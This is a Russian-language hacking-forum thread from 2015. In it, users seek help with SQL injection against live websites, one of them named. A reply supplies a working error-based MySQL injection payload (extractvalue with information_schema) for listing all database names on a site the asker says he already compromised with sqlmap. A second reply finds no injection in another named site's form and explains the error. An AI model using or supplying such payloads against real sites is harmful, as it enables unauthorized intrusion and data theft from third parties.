HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости

Опции темы Поиск в этой теме Опции просмотра

Старый 09.10.2015, 12:21
XAMEHA
Новичок
Провел на форуме:
2268

Цитата:
Сообщение от AlexG  
AlexG said:

Привет. Столкнулся с таким вопросом. Есть сайт, скульмапом я его расковырял давно (там тайм-бейсед). Теперь хочу руками, получаю данные с помощью extravalue. С текущей базой все хорошо, но я точно знаю что баз несколько. Как изменить вот такой запрос -
Код:
Code:
extractvalue(0x0a,/*!50000concat*/(0x0a,(select database())))
для работы с другими базами (как перебрать имена всех баз)?
Вектор объединения значений для extractvalue:

https://rdot.org/forum/showthread.php?t=2860

Код:
Code:
extractvalue(1, concat(0x3A, mid((X), Y, 31)))
X = SELECT convert(max(binary reverse(insert(0x3A, 1, 0, reverse(concat(schema_name, 0x0A))))), char(1000000)) FROM information_schema.schemata
Где Y = 1 + I * 31, i = 0, 1, ...

Но советую вам взять запрос из той темы, через него вы сразу получите и имена всех баз, и имена всех таблиц, и имена всех колонок.

Цитата:
Сообщение от Valer4ik  
Valer4ik said:

Приветствую, помогите со скулей, сканер накорырял. хттп://karelia.pro/kondopoga/business-internet/ там,
справа есть форма "Заявка на подключение". В POST запросе передается пара-тройка параметров, но ошибка возникает,
если запрос повторить, вылазит ошибка.
MySql error: Duplicate entry '89.234.157.254-2015-10-07 12:23:38' for key 'PRIMARY'

query: INSERT INTO `business_logs`(`ip`, `date`, `oper`) VALUES ('89.234.157.254', NOW(), 'none')
...
не могу раздуплить где формируються параметры из ошибки, откуда ковырять. Sqlmap-ом утюжил пол ночи, он тоже не понимает, только
false positive. Единственное не пробовал в headers ижектить. Посмотрел заголовки в burb, походу како-то js скрипт эту инфу отправляет.
Можно это как то раскрутить?
Скули нет. Второй столбец в таблице business_logs является первичным ключем. Он обязан содержать уникальное значение. Так как туда заносятся текущая дата и время, этого не происходит. Вы же выполняете более чем 1 запрос в секунду? Интересно, как сайт вообще работал.